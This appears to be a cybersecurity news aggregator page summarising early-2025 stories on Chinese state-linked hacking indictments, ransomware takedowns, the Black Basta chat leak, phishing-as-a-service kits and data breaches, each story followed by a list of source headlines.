@World - CBSNews.com
//
The U.S. Justice Department has indicted 12 Chinese nationals for their alleged involvement in state-linked cyber operations. The individuals include employees of the Chinese technology firm i-Soon, members of the APT27 group (also known as Emissary Panda, TG-3390, Bronze Union, and Lucky Mouse), and two officers from China's Ministry of Public Security. These indictments shed light on the hacking tools and methods allegedly employed in a global hacking scandal. The Justice Department stated that the Ministry of State Security (MSS) and Ministry of Public Security (MPS) utilized an extensive network of private companies, including i-Soon, to conduct unauthorized computer intrusions in the U.S. and elsewhere.
The U.S. DoJ charges these individuals with data theft and suppressing dissent worldwide. i-Soon, identified as one of the private companies involved, allegedly provided tools and methods to customers and hacked for the PRC (People's Republic of China). These actions highlight a significant cybersecurity concern involving state-sponsored actors and their use of private firms to conduct cyber espionage.
Recommended read:
References :
- bsky.app: US Justice Department has charged Chinese state security officers and APT27 and i-Soon Chinese hackers linked to network breaches and cyberattacks targeting victims worldwide since 2011.
- CyberInsider: U.S. Charges 12 Chinese Nationals Over Decade-Long Cyber Espionage Campaign
- The Cyber Express: The United States Department of Justice (DOJ) has taken action against a major cyber threat, opening indictments against 12 Chinese nationals, including two officers from China’s Ministry of Public Security (MPS) and several employees of the Chinese technology firm i-Soon.
- bsky.app: USA accuses China's State of operating network of "hackers for hire". Accused 12 individuals, 2 officers of the PRC Ministry of Public Security (MPS), employees of a private company, Anxun Information Technology Co. Ltd, and members of APT27.
- The Hacker News: U.S. Charges 12 Chinese Nationals in State-Backed Hacking Operations
- securityaffairs.com: US DOJ charges 12 Chinese nationals for state-linked cyber operations
- The Register - Security: Xi's freelance infosec warriors apparently paid up to $75K to crack a single American inbox US government agencies announced Wednesday criminal charges against alleged members of China's Silk Typhoon gang, plus internet domain seizures linked to a long-term Chinese espionage campaign that saw Beijing hire miscreants to compromise US government agencies and other major orgs.…
- DataBreaches.Net: U.S. Charges 12 Chinese Contract Hackers and Law Enforcement Officers in Global Computer Intrusion Campaigns
- bsky.app: The US Justice Department has charged Chinese state security officers and APT27 and i-Soon Chinese hackers linked to network breaches and cyberattacks targeting victims worldwide since 2011.
- cyble.com: U.S. Indictments Shed Light on i-Soon Hacking Tools, Methods
- Metacurity: US indicts twelve prolific Chinese hackers, including eight i-Soon staffers
- Carly Page: The Department of Justice has announced criminal charges against 12 Chinese government-linked hackers who are accused of hacking over 100 American organizations, including the U.S. Treasury, over the course of a decade
- Threats | CyberScoop: US indicts 12 Chinese nationals for vast espionage attack spree
- BleepingComputer: The U.S. Justice Department has charged Chinese state security officers along with APT27 and i-Soon hackers for network breaches and cyberattacks that have targeted victims globally since 2011.
- hackread.com: US Charges 12 in Chinese Hacker-for-Hire Network, Offers $10M Reward
- Risky Business: US indicts the i-Soon and APT27 hackers, the BADBOX botnet gets disrupted again,authorities seize the Garantex crypto exchange, and the FBI arrests hackers who stole Taylor Swift concert tickets.
- Security | TechRepublic: Targets included the U.S. Treasury Department, journalists, and religious organisations, and the attacks intended to steal data and suppress free speech.
- techxplore.com: US indicts 12 Chinese nationals in hacking
- : US Charges Members of Chinese Hacker-for-Hire Group i-Soon
- Matthias Schulze: U.S. Charges 12 Chinese Nationals in State-Backed Hacking Operations
@techcrunch.com
//
A global police operation involving agencies from Europe, Japan, the U.S., and the U.K. has successfully seized the dark web leak site of the 8Base ransomware gang. The takedown message displayed on the site was confirmed as legitimate by Lucy Sneddon, a spokesperson for the U.K.’s National Crime Agency. While the U.K. played a supportive role, other involved agencies have not yet commented. Security researchers first noticed the seizure notice earlier this week.
This operation is part of a larger effort targeting ransomware gangs. In a related development, authorities have arrested four suspected Phobos ransomware hackers in Phuket, Thailand. These individuals are accused of conducting cyberattacks on over 1,000 victims worldwide and extorting $16,000,000 worth of Bitcoin. The operation, codenamed "Phobos Aetor," involved raids across multiple locations.
Recommended read:
References :
- CyberInsider: Phobos Ransomware Gang Dismantled in International Sting
- BleepingComputer: Police arrests 4 Phobos ransomware suspects, seizes 8Base sites
- BleepingComputer: A global law enforcement operation targeting the Phobos ransomware gang has led to the arrest of four suspected hackers in Phuket, Thailand, and the seizure of 8Base's dark web sites. The suspects are accused of conducting cyberattacks on over 1,000 victims worldwide.
- bsky.app: A global law enforcement operation targeting the Phobos ransomware gang has led to the arrest of four suspected hackers in Phuket, Thailand, and the seizure of 8Base's dark web sites. The suspects are accused of conducting cyberattacks on over 1,000 victims worldwide.
- Carly Page: Mastodon post confirming the takedown of 8Base's leak site.
- techcrunch.com: TechCrunch reports on the global police operation seizing the 8base ransomware gang leak site.
- www.bleepingcomputer.com: BleepingComputer's report on the takedown of 8Base's dark web sites.
- DataBreaches.Net: Reports on police arresting 4 Phobos ransomware suspects and seizing 8Base sites.
- Threats | CyberScoop: cyberscoop article on 8base
- cyberscoop.com: Thai authorities detain four Europeans in ransomware crackdown
- Anonymous ???????? :af:: A global law enforcement operation targeting the Phobos ransomware gang has led to the arrest of four suspected hackers in Phuket, Thailand, and the seizure of 8Base’s dark web sites.
- The Register - Security: The Register: All your 8Base are belong to us: Ransomware crew busted in global sting
- securityaffairs.com: Report on the 8Base ransomware takedown highlighting the international collaboration.
- The Hacker News: The Hacker News: 8Base Ransomware Data Leak Sites Seized in International Law Enforcement Operation
- www.helpnetsecurity.com: The Thai police has arrested four individuals suspected of being the leaders of the 8Base ransomware group and of stealing approximately $16 million from 1,000+ victims they targeted with the Phobos ransomware.
- BleepingComputer: Police arrests 2 Phobos ransomware suspects, seizes 8Base sites - BleepingComputer
- socradar.io: International Operation Targets 8Base and Phobos Ransomware Gangs In a coordinated global effort, law enforcement agencies have successfully dismantled the dark web infrastructure of the 8Base ransomware gang and arrested four individuals linked to the Phobos ransomware.
- Help Net Security: 8Base ransomware group leaders arrested, leak site seized
- PCMag UK security: An international operation has dealt a major blow to a cybergang known as 8Base, which used the Phobos to infect hundreds of companies and organizations.
- techcrunch.com: Authorities arrest four suspected 8base ransomware operators in global takedown
- www.europol.europa.eu: Report on the global law enforcement operation that led to the arrests.
- Security Boulevard: Authorities Seize 8Base Ransomware Infrastructure, Arrest Four Russians
- securityboulevard.com: With "Operation Phobos Aetor," international law enforcement, including the US DOJ and Europol, arrest four Russian nationals and seize infrastructure connected to the 8Bbase ransomware group, the largest affiliate of the prolific Phobos RaaS operation.
- securityaffairs.com: Global law enforcement operation targeting the 8Base ransomware gang and related criminal activity.
- Carly Page: A global law enforcement operation has led to the arrest of four individuals who authorities accuse of being key figures in the 8base ransomware operation. The four suspects are accused of amassing $16 million through ransomware attacks against more than 1,000 organizations globally
- www.csoonline.com: Law enforcement agencies from 14 countries collaborated in an investigation against the related Phobos and 8Base ransomware operations, arresting four suspects and seizing 27 servers, including the data leak and ransom negotiation websites.
Dissent@DataBreaches.Net
//
Leaked internal chat logs from the Black Basta ransomware group have provided unprecedented insight into the tactics, planning, and operational methods of cybercriminals. The Veriti Research team analyzed these communications, uncovering the group's favored exploits, the security measures they routinely bypass, and the defenses they fear most. The leak, rivals that of the Conti ransomware gang, exposes Black Basta's meticulous study of potential victims and their sophisticated phishing and malware campaigns.
The analysis reveals Black Basta's focus on exploiting vulnerabilities in VMware ESXi, Microsoft Exchange, Citrix VPNs, and Fortinet firewalls. They actively discuss bypassing EDR, SIEM, and firewall protections to maintain persistence within compromised networks, leveraging cloud services for malware hosting and command-and-control infrastructure. Despite their skills, Black Basta members express frustration when EDRs, firewalls, and IP reputation monitoring disrupt their operations. A key member of Black Basta contended they had been able to elude law enforcement in mid-2024 with help from influential people.
Recommended read:
References :
- VERITI: Inside the Minds of Cybercriminals: A Deep Dive into Black Basta’s Leaked Chats
- DataBreaches.Net: Black Basta exposed: A look at a cybercrime data leak and a key member, “Tramp�
- www.csoonline.com: Ransomware access playbook: What Black Basta’s leaked logs reveal
- Information Security Buzz: VulnCheck Exposes CVEs from Black Bastas’ Chats
- Risky Business: Risky Business Talks interview with Will Thomas on the Black Basta leaks
- bsky.app: New research has uncovered further links between the Black Basta and Cactus ransomware gangs, with members of both groups utilizing the same social engineering attacks and the BackConnect proxy malware for post-exploitation access to corporate networks.
- Virus Bulletin: Trend Micro researchers discuss how the Black Basta and Cactus ransomware groups utilized the BackConnect malware to maintain persistent control and exfiltrate sensitive data from compromised machines.
- www.bleepingcomputer.com: Microsoft Teams tactics, malware connect Black Basta, Cactus ransomware
- Secure Bulletin: Black Basta and CACTUS ransomware: shared BackConnect module signals affiliate transition
- flare.io: On February 20, 2025, the cybersecurity community received an unexpected stroke of luck as internal strife seemingly spread within the infamous Black Basta ransomware group.
Amar Ćemanović@CyberInsider
//
Japanese telecom giant NTT Communications has confirmed a data breach impacting nearly 18,000 corporate customers. The company discovered unauthorized access to its internal systems on February 5, 2025. Hackers are reported to have accessed details of these organizations, potentially compromising sensitive data.
The stolen data includes customer names, contract numbers, phone numbers, email addresses, physical addresses, and information on service usage belonging to 17,891 organizations, according to NTT Com. While NTT Com has restricted access to compromised devices and disconnected another compromised device, the specific nature of the cyberattack and the identity of the perpetrators remain unknown. It’s not yet known how many individuals had personal data stolen.
Recommended read:
References :
- Carly Page: Japanese telecom giant NTT Communications says hackers stole the data of almost 18,000 corporate customers during a February cyberattack. It’s not yet known how many individuals had personal data stolen or who was behind the NTT breach
- CyberInsider: NTT Communications Suffers Data Breach Impacting 18,000 Companies
- BleepingComputer: Japanese telecommunication services provider NTT Communications Corporation (NTT) is warning almost 18,000 corporate customers that their information was compromised during a cybersecurity incident.
- techcrunch.com: Unidentified hackers breached NTT Com’s network to steal personal information of employees at thousands of corporate customers
- bsky.app: Japanese telecommunication services provider NTT Communications Corporation (NTT) is warning almost 18,000 corporate customers that their information was compromised during a cybersecurity incident.
- The DefendOps Diaries: Lessons from the NTT Data Breach: A 2025 Perspective
- bsky.app: Japanese telecommunication services provider NTT Communications Corporation (NTT) is warning almost 18,000 corporate customers that their information was compromised during a cybersecurity incident.
- www.scworld.com: NTT Communications says hackers stole the data of almost 18,000 corporate customers during a February cyberattack
- securityaffairs.com: Japanese telecom giant NTT suffered a data breach that impacted 18,000 companies
- The420.in: Japanese Telecom Giant NTT Suffers Data Breach, Impacting 18,000 Companies
@www.chainalysis.com
//
Ransomware payments experienced a significant decline in 2024, dropping by 35% to approximately $813.55 million, according to a report by Chainalysis. This marks a notable decrease from the record $1.25 billion paid in 2023. The decline reflects a growing trend of victims refusing to pay extortion demands, despite ransomware gangs posting more victims on leak sites. The shift suggests that organizations are becoming more resilient to ransomware attacks, possibly due to enhanced data recovery strategies and the impact of increased law enforcement interventions.
The surprising decrease in payments, particularly in the second half of 2024, signals a potential change in the ransomware landscape. Crypto forensics firm Chainalysis noted that sums demanded by cyber gangs in the second half of 2024 were 53% higher than actual payouts. Law enforcement actions, including disruptions to prolific ransomware gangs like LockBit and improved international collaboration, are also contributing to this downturn. This indicates a shift in the financial dynamics of ransomware operations.
Recommended read:
References :
- Carly Page: Ransomware payments fell by more than one-third in 2024 as an increasing number of victims refused to negotiate with hackers
- techcrunch.com: Ransomware payments fell by more than one-third in 2024 as an increasing number of victims refused to negotiate with hackers.
- Help Net Security: Ransomware payments plummet as more victims refuse to pay
- techcrunch.com: TechCrunch covers Chainalysis' report on the decline in ransomware payments.
- www.chainalysis.com: Chainalysis' blog post presents their full analysis of the cryptocurrency crime trends in 2024.
- www.cybersecurity-insiders.com: Good news as ransomware pay fell by 35 percent in 2024
- www.helpnetsecurity.com: Ransomware payments plummet as more victims refuse to pay
- Ars OpenForum: Amount paid by victims to hackers declined by hundreds of millions of dollars.
- Techmeme: In 2024, ransomware attackers received ~$813.55M in payments from victims, down 35% on 2023's record $1.25B, as more victims refused to pay (Chainalysis)
- arstechnica.com: Amount paid by victims to hackers declined by hundreds of millions of dollars.
- www.cybersecurity-insiders.com: Good news as ransomware pay fell by 35 percent in 2024
- Moonshot News: Ransomware payments have changed dramatically
- moonshot.news: Ransomware payments fell 35% in 2024 from 2023 record-breaking $1.25 billion down to $813.55 million, marking the first revenue decline since 2022, US blockchain data platform Chainalysis reports.
- www.techmeme.com: In 2024, ransomware attackers received ~$813.55M in payments from victims, down 35% on 2023's record $1.25B, as more victims refused to pay
- cyberscoop.com: CyberScoop reports that ransomware payments dropped 35% in 2024.
- Blog: Field Effect reports on the decline in ransomware payments and increase in attack frequency.
- securityboulevard.com: Law enforcement actions, better defenses, and a refusal by victims to pay helped to reduce the amount of ransoms paid in 2024 by $35%, a sharp decline from the record $1.25 billion shelled out in 2023, according to researchers with Chainalysis.
- www.heise.de: Various measures against cybercriminals have once again shown success in 2024: Ransom payments following ransomware attacks have fallen again.
- Security Boulevard: Security Boulevard article on ransomware payments falling 35% in 2024.
- cyberpress.org: Cyberpress reports on ransomware payments plummeting in 2024.
- TechInformed: TechInformed reports on ransomware payments plummeting in 2024.
Lily Hay@WIRED
//
Cybercriminals have allegedly stolen over $635,000 worth of Taylor Swift concert tickets by exploiting a loophole in an offshore ticketing system. Two individuals, Tyrone Rose, 20, and Shamara Simmons, 31, have been arrested and charged with grand larceny and computer tampering. The scheme involved stealing URLs for nearly 1,000 tickets to various events, including Taylor Swift's Eras Tour, Ed Sheeran concerts, Adele concerts, NBA games, and the US Open Tennis Championships, before reselling them for substantial profit.
Between June 2022 and July 2023, Rose and Simmons allegedly stole the tickets through an offshore ticket vendor and then resold them on StubHub in the US for significant profit. Rose, an employee of Sutherland Global Services, a third-party contractor for StubHub Jamaica, is accused of abusing his access to the network to find a backdoor. Prosecutors say the pair stole the tickets by allegedly intercepting approximately 350 orders from StubHub. The investigation is ongoing to determine if the Swift ticket scam was part of a wider operation.
Recommended read:
References :
- WIRED: Cybercriminals Allegedly Used a StubHub Backdoor to Steal Taylor Swift Tickets
- The Register - Security: Alleged cyber scalpers Swiftly cuffed over $635K Taylor ticket heist
- The DefendOps Diaries: Cybercrime Exposes Vulnerabilities in Ticketing Systems: A Case Study
- BleepingComputer: Cybercrime 'crew' stole $635,000 in Taylor Swift concert tickets
- darkmarc.substack.com: Cybercriminals pulled off a massive ATM heist, hackers stole $600K in Taylor Swift concert tickets, and Mark Cuban made a bold move for laid-off tech workers. Instagram users were hit with a disturbing glitch, and Mozilla’s new terms sparked privacy fears. Here’s what happened this week.
- www.techradar.com: Cybercriminals used vendor backdoor to steal almost $600,000 of Taylor Swift tickets
@www.the420.in
//
A significant leak of internal chat logs from the Black Basta ransomware gang has surfaced online, exposing the group's inner workings. TechCrunch obtained a copy of the chat logs, which reveal internal strife, financial disputes, and operational details spanning from September 2023 to September 2024. The exposed communications shed light on the gang's key members, targeted organizations, exploits, and even their fears of government intervention, with one leaker alleging the group "crossed the line" by targeting Russian domestic banks.
The leaked chat logs provide insights into Black Basta's structure, including administrators and hackers linked to the Qakbot botnet. One member, known as "Trump" or "AA" and "GG," is believed to be Oleg Nefedovaka, potentially the group's main boss with connections to the defunct Conti ransomware group. The leak has also exposed Black Basta's phishing templates, victim credentials, and cryptocurrency addresses. The exposure of this sensitive information could significantly disrupt the gang's operations and assist cybersecurity professionals in understanding and mitigating Black Basta's tactics.
Recommended read:
References :
- techcrunch.com: A huge trove of chat logs from the Black Basta ransomware gang have leaked online. TechCrunch obtained a copy.
- cyberinsider.com: A major leak of internal chat logs from the Black Basta ransomware gang has exposed deep internal conflicts, failed operations, and financial disputes.
- www.scworld.com: Purported Black Basta internal communications exposed
- www.the420.in: A massive leak of internal chat logs from the BlackBasta ransomware group has exposed the inner workings of the notorious cybercriminal organization, revealing internal conflicts, financial disputes, and the group’s eventual disbanding.
- Zack Whittaker: New, w/ : A huge trove of chat logs from the Black Basta ransomware gang have leaked online. TechCrunch obtained a copy. The logs reveal new details on the group's members (including a 17-year-old), which organizations it targeted, their exploits, and their fears of being vanned by the Russian government. More:
- socradar.io: Black Basta’s Internal Chats Leak: Everything You Need to Know
- CyberInsider: Black Basta Ransomware Chats Leaked Exposing Internal Chaos
- threatmon.io: The Implosion of Black Basta: A Deep Dive into the Leaked Chat Logs and Operational Collapse The recent leak of internal chat logs from the Black Basta ransomware syndicate has provided unprecedented visibility into the operations, conflicts, and eventual disintegration of one of the most prolific cybercriminal groups of the past three years.
- Blog: New Details on Black Basta Operations via Leaked Chats on Telegram
- ThreatMon: The Implosion of Black Basta: A Deep Dive into the Leaked Chat Logs and Operational Collapse
- Carly Page: A trove of chat logs allegedly belonging to the prolific Black Basta ransomware group has leaked online, revealing unprecedented insights into the gang's operations The logs, seen by TechCrunch, also name several previously unknown targeted organizations
- bsky.app: Article reporting on the leak of Black Basta ransomware gang's internal chat logs.
- www.bleepingcomputer.com: Article on the Black Basta ransomware gang's internal chat logs leak.
- BleepingComputer: The article reports on the leak of internal communications from the Black Basta ransomware group.
- arstechnica.com: Report sheds new light on the tactics allowing Black Basta and other attackers to move at breakneck speed.
- mastodon.social: A significant leak of internal chat logs from the Black Basta ransomware group revealed significant operational details.
- securityaffairs.com: Leaked Black Basta chat logs reveal internal conflicts, exposing member details and hacking tools as the gang reportedly falls apart.
- Kali Linux Tutorials: BlackBasta Chat : The Inner Workings Of A Notorious Ransomware Group
- socradar.io: Seraph Stealer Malware Hits the Market, Black Basta’s Internal Chaos, New Data Leak Claims
- thecyberexpress.com: Black Basta Chat Logs Reveal Ransomware Group’s TTPs, IoCs
- DataBreaches.Net: DataBreaches.net reporting Black Basta exposed: A look at a cybercrime data leak and a key member, “Tramp�.
- blog.bushidotoken.net: BushidoToken analysis of BlackBasta Leaks: Lessons from the Ascension Health attack
- VERITI: Veriti's analysis of Black Basta's Leaked Chats.
Dhara Shrivastava@cysecurity.news
//
February witnessed a record-breaking surge in ransomware attacks, fueled by the prolific activity of groups like CL0P, known for exploiting MFT vulnerabilities. The ransomware landscape is also seeing significant activity from groups like Akira and RansomHub.
Recent analysis reveals a notable development with the Black Basta and CACTUS ransomware groups, uncovering a shared BackConnect module. This module, internally tracked as QBACKCONNECT, provides extensive remote control capabilities, including executing commands and exfiltrating sensitive data. The Qilin ransomware group has also claimed responsibility for attacks on the Utsunomiya Central Clinic (UCC), a cancer treatment center in Japan, and Rockhill Women's Care, a gynecology facility in Kansas City, stealing and leaking sensitive patient data.
Recommended read:
References :
- cyble.com: February Sees Record-Breaking Ransomware Attacks, New Data Shows
- The Register - Security: Qilin ransomware gang claims attacks on cancer clinic, OB-GYN facility
- iHLS: Ransomware Group Targets Cancer Clinic, Exposes Sensitive Health Data
- securityaffairs.com: Medusa ransomware has claimed nearly 400 victims since January 2023, with attacks increasing by 42% between 2023 and 2024.
- thecyberexpress.com: Ransomware attacks set a single-month record in February that was well above previous highs.
- The DefendOps Diaries: Akira Ransomware: Unsecured Webcams and IoT Vulnerabilities
- blog.knowbe4.com: A new report from Arctic Wolf has found that 96% of attacks now involve data theft as criminals seek to force victims to pay up.
- DataBreaches.Net: The Akira ransomware gang exploited an unsecured webcam to bypass EDR and launch encryption attacks on a victim's network.
@techcrunch.com
//
A global law enforcement operation has successfully disrupted the 8Base ransomware group, leading to the arrest of four individuals accused of being key figures in the operation. The suspects were apprehended in Phuket, Thailand, and are alleged to have amassed $16 million through ransomware attacks targeting over 1,000 organizations worldwide. Authorities have also seized the dark web infrastructure utilized by the group.
This coordinated effort resulted in the dismantling of 8Base's dark web data leak and negotiation sites, effectively crippling their ability to further extort victims. The operation, codenamed "Phobos Aetor", involved coordinated raids across multiple locations, resulting in the seizure of laptops, smartphones, and cryptocurrency wallets.
Recommended read:
References :
- BleepingComputer: A global law enforcement operation targeting the Phobos ransomware gang has led to the arrest of four suspected hackers in Phuket, Thailand, and the seizure of 8Base's dark web sites. The suspects are accused of conducting cyberattacks on over 1,000 victims worldwide.
- Carly Page: A global law enforcement operation has led to the arrest of four individuals who authorities accuse of being key figures in the 8base ransomware operation. The four suspects are accused of amassing $16 million through ransomware attacks against more than 1,000 organizations globally
- securityaffairs.com: Operation Phobos Aetor: Police dismantled 8Base ransomware gang
- BleepingComputer: A global law enforcement operation targeting the Phobos ransomware gang has led to the arrest of four suspected hackers in Phuket, Thailand, and the seizure of 8Base's dark web sites. The suspects are accused of conducting cyberattacks on over 1,000 victims worldwide. [...]
- cyberscoop.com: Thai authorities detain four Europeans in ransomware crackdown
- The Register - Security: All your 8Base are belong to us: Ransomware crew busted in global sting
- socradar.io: International Operation Targets 8Base and Phobos Ransomware Gangs
- securityboulevard.com: Authorities Seize 8Base Ransomware Infrastructure, Arrest Four Russians
- techcrunch.com: Authorities arrest four suspects in global 8base ransomware takedown
@www.bleepingcomputer.com
//
The Darcula phishing-as-a-service (PhaaS) platform is set to launch its third major version, Darcula 3.0, offering cybercriminals unprecedented capabilities. A key feature is the ability for even tech-illiterate individuals to create and deploy do-it-yourself phishing kits targeting any brand globally. This is made possible through browser automation tools like Puppeteer and Headless Chrome, allowing users to clone legitimate websites and inject malicious content with minimal effort. The platform also simplifies the creation of phishing kits by extracting assets and HTML structure from targeted brand websites, enabling fraudsters to customize templates and generate multi-step pages for data collection, such as payment details and two-factor authentication codes.
The updated Darcula platform includes a user-friendly interface that automates the creation of phishing kits. The final product is exported as a “.cat-page” bundle, deployable via Darcula’s admin panel. The admin panel, resembling legitimate Software-as-a-Service (SaaS) platforms, provides dashboards to manage stolen data, monitor campaigns, and configure advanced deception techniques. Built using technologies like Docker, React, and SQLite, it offers IP filtering, web crawler blocking, and device-specific access restrictions to evade detection. The platform also facilitates monetization of stolen data by enabling fraudsters to generate virtual cards from compromised payment details.
Recommended read:
References :
- cyberpress.org: Darcula 3.0 – A Tool that Offer Phishing kit for Any Brands
- The Hacker News: Cybercriminals Can Now Clone Any Brand’s Site in Minutes Using Darcula PhaaS v3
- www.bleepingcomputer.com: The Darcula phishing-as-a-service (PhaaS) platform is preparing to release its third major version, with one of the highlighted features, the ability to create do-it-yourself phishing kits to target any brand.
- www.helpnetsecurity.com: Darcula allows tech-illiterate crooks to create, deploy DIY phishing kits targeting any brand
- gbhackers.com: New Darcula 3.0 Tool Generates Phishing Kits to Mimic Global Brands
- Talkback Resources: 'Darcula' Phishing Kit Can Now Impersonate Any Brand
- BleepingComputer: The Darcula phishing-as-a-service (PhaaS) platform is preparing to release its third major version, with one of the highlighted features, the ability to create do-it-yourself phishing kits to target any brand.
- gbhackers.com: GB Hackers - New Darcula 3.0 Tool Generates Phishing Kits to Mimic Global Brands
- Help Net Security: Help Net Security - Darcula allows tech-illiterate crooks to create, deploy DIY phishing kits targeting any brand
- Cyber Security News: Darcula 3.0 – A Tool that Offer Phishing kit for Any Brands
- The420.in: Cybercriminals behind the notorious Darcula phishing-as-a-service (PhaaS) platform are preparing to roll out a new and more sophisticated version that enables scammers to clone any brand’s legitimate website effortlessly.
- www.the420.in: Darcula Phishing Platform Set to Launch Advanced Version
- Cybernews: Infosec exchange discussing new phishing tool for cybercriminals
@cyberinsider.com
//
Dutch Police have dismantled the ZServers/XHost bulletproof hosting operation, seizing 127 servers. The takedown follows a year-long investigation into the network, which has been used by cybercriminals to facilitate illegal activities. This includes the spread of malware, botnets, and various cyberattacks.
Earlier this week, authorities in the United States, Australia, and the United Kingdom announced sanctions against the same bulletproof hosting provider for its involvement in cybercrime operations. ZServers was accused of facilitating LockBit ransomware attacks and supporting the cybercriminals' efforts to launder illegally obtained money, according to The Record. The Cybercrime Team Amsterdam will conduct an additional probe of the servers, as the company advertised the possibility for customers to allow criminal acts from its servers while remaining anonymous to law enforcement.
Recommended read:
References :
- cyberinsider.com: Police Dismantle Bulletproof Hosting Provider ZServers/XHost
- gbhackers.com: Dutch Authorities Dismantle Network of 127 Command-and-Control Servers
- www.bleepingcomputer.com: The Dutch Police (Politie) dismantled the ZServers/XHost bulletproof hosting operation after taking offline 127 servers used by the illegal platform.
- www.scworld.com: Zservers/XHost servers dismantled by Dutch police
- Metacurity: Dutch cops dismantle ZServers bulletproof hosting operation
- BleepingComputer: The Dutch Police (Politie) dismantled the ZServers/XHost bulletproof hosting operation after taking offline 127 servers used by the illegal platform.
- CyberInsider: Police Dismantle Bulletproof Hosting Provider ZServers/XHost
- DataBreaches.Net: Dutch Police seizes 127 XHost servers, dismantles bulletproof hoster
- www.politie.nl: Politie Amsterdam ontmantelt digitaal crimineel netwerk; 127 servers offline gehaald - "an investigation of over a year, dismantled a bulletproof hoster on the Paul van Vlissingenstraat in Amsterdam. During the raid on February 12, 127 servers were taken offline and seized."
- Cybernews: After a year-long investigation, Amsterdam's Cybercrime Team shut down a bulletproof hosting provider, seizing 127 servers.
- securityaffairs.com: Dutch Police shut down bulletproof hosting provider Zservers and seized 127 servers
Swagta Nath@The420.in
//
The cybercriminal group EncryptHub, also known as LARVA-208, has successfully breached 618 organizations globally since June 2024. The group utilizes sophisticated social engineering techniques, including spear-phishing, to steal credentials and deploy ransomware on corporate networks. The attacks are designed to compromise systems and steal sensitive information, showcasing a high level of sophistication and a clear focus on targeting businesses worldwide.
LARVA-208's methods involve impersonating IT personnel and deceiving employees into divulging VPN credentials or installing remote management software. They have also been observed registering domain names mimicking popular VPN services to enhance the credibility of their phishing campaigns. After gaining access, the group deploys custom-developed PowerShell scripts to install information-stealing malware and ransomware, encrypting files on compromised systems and demanding cryptocurrency payments via ransom notes left on the victim device.
Recommended read:
References :
- gbhackers.com: GBHackers article about LARVA-208 Hackers Compromise 618 Organizations Stealing Logins and Deploying Ransomware
- Talkback Resources: TalkBack describes EncryptHub Exposed: 600+ Targets Hit by LARVA-208
- The420.in: The420 article about EncryptHubTargets 618 Organizations with Phishing and Ransomware Attacks
- bsky.app:
A threat actor tracked as 'EncryptHub,' aka
Larva-208, has been targeting organizations worldwide with spear-phishing and social engineering attacks to gain access to corporate networks.
- bsky.app: A threat actor tracked as 'EncryptHub,' aka Larva-208,  has been targeting organizations worldwide with spear-phishing and social engineering attacks to gain access to corporate networks.
@www.reliaquest.com
//
ReliaQuest researchers are warning that the BlackLock ransomware group is poised to become the most prolific ransomware-as-a-service (RaaS) operation in 2025. BlackLock, also known as El Dorado, first emerged in early 2024 and quickly ascended the ranks of ransomware groups. By the fourth quarter of 2024, it was already the seventh most prolific group based on data leaks, experiencing a massive 1,425% increase in activity compared to the previous quarter.
BlackLock's success is attributed to its active presence and strong reputation within the RAMP forum, a Russian-language platform for ransomware activities. The group is also known for its aggressive recruitment of traffers, initial access brokers, and affiliates. They employ double extortion tactics, encrypting data and exfiltrating sensitive information, threatening to publish it if a ransom is not paid. Their custom-built ransomware targets Windows, VMWare ESXi, and Linux environments.
Recommended read:
References :
- AAKL: ReliaQuest: Threat Spotlight: Inside the World’s Fastest Rising Ransomware Operator — BlackLock More: Infosecurity-Magazine: BlackLock On Track to Be 2025’s Most Prolific Ransomware Group
- Christoffer S.: ReliaQuest Inside the World’s Fastest Rising Ransomware Operator - BlackLock Somewhat of a deep dive into a relatively new RaaS (BlackLock), a very active group both on RAMP and with adding new victims to their leaksite.
- www.helpnetsecurity.com: BlackLock ransomware onslaught: What to expect and how to fight it
- www.reliaquest.com: ReliaQuest: Threat Spotlight: Inside the World’s Fastest Rising Ransomware Operator — BlackLock
- Help Net Security: In-depth analysis of the BlackLock ransomware group and their operational methods.
- www.infosecurity-magazine.com: ReliaQuest: Threat Spotlight: Inside the World’s Fastest Rising Ransomware Operator — BlackLock More: Infosecurity-Magazine: BlackLock On Track to Be 2025’s Most Prolific Ransomware Group
- cyberpress.org: BlackLock Ransomware Evolves: Threatens Windows, VMware ESXi, and Linux Systems
- gbhackers.com: BlackLock Ransomware Targets Windows, VMware ESXi, & Linux Environments
- Cyber Security News: BlackLock Ransomware Evolves: Threatens Windows, VMware ESXi, and Linux Systems
- gbhackers.com: BlackLock Ransomware Targets Windows, VMware ESXi, & Linux Environments
Daniel Kelley@SlashNext
//
A new phishing kit named Astaroth has emerged as a significant threat, targeting Microsoft, Gmail, Yahoo, AOL, Office 365, and other third-party login services. It uses an evilginx-style reverse proxy to perform man-in-the-middle attacks, enabling it to bypass two-factor authentication (2FA). Discovered on cybercrime marketplaces, Astaroth employs advanced techniques like session hijacking and real-time credential interception to dynamically retrieve authorization tokens, 2FA tokens, and session cookies, unlike traditional phishing tools.
Astaroth operates by redirecting victims to malicious servers mimicking legitimate login pages, complete with SSL certificates to avoid raising security warnings. The kit intercepts traffic in real-time, capturing login credentials and 2FA tokens before forwarding them to the legitimate server. Key features include bulletproof hosting and continuous updates for six months. It is marketed as an easy-to-use, 2-in-1 solution, costing $2000, and even includes pre-purchase testing to demonstrate its effectiveness in real-world attacks.
Recommended read:
References :
- Cyber Security News: Report on Astaroth 2FA phishing kit targeting multiple platforms.
- gbhackers.com: GBHackers article on the Astaroth kit.
- SlashNext: Phishing attacks continue to evolve, pushing even the most secure authentication methods to their limits. First advertised on cybercrime networks in late January 2025, Astaroth is a brand new phishing kit that bypasses two-factor authentication (2FA) through session hijacking and real-time credential interception.
- cyberpress.org: Astaroth 2FA Phishing Kit Exploits Gmail, Yahoo, Office 365, and Third-Party Accounts
- slashnext.com: Astaroth: A New 2FA Phishing Kit Targeting Gmail, Yahoo, AOL, O365, and 3rd-Party Logins
- gbhackers.com: gbhackers.com
- www.cysecurity.news: Details about Astaroth, including its features and marketing.
- MSSP feed for Latest: MSSPalert brief on the Astaroth phishing kit.
- hackread.com: Astaroth Phishing Kit Bypasses 2FA to Hijack Gmail and Microsoft Accounts
Dissent@DataBreaches.Net
//
A cybercriminal responsible for over 90 data leaks has been apprehended in Bangkok following a joint operation between the Royal Thai Police and the Singapore Police Force. The individual, known under aliases such as ALTDOS, DESORDEN, GHOSTR, and 0mid16B, targeted 65 organizations in the Asia-Pacific region and an additional 25 global targets. Between 2020 and February 2025, the hacker exfiltrated a staggering 13 terabytes of sensitive data from various sectors, including healthcare and finance.
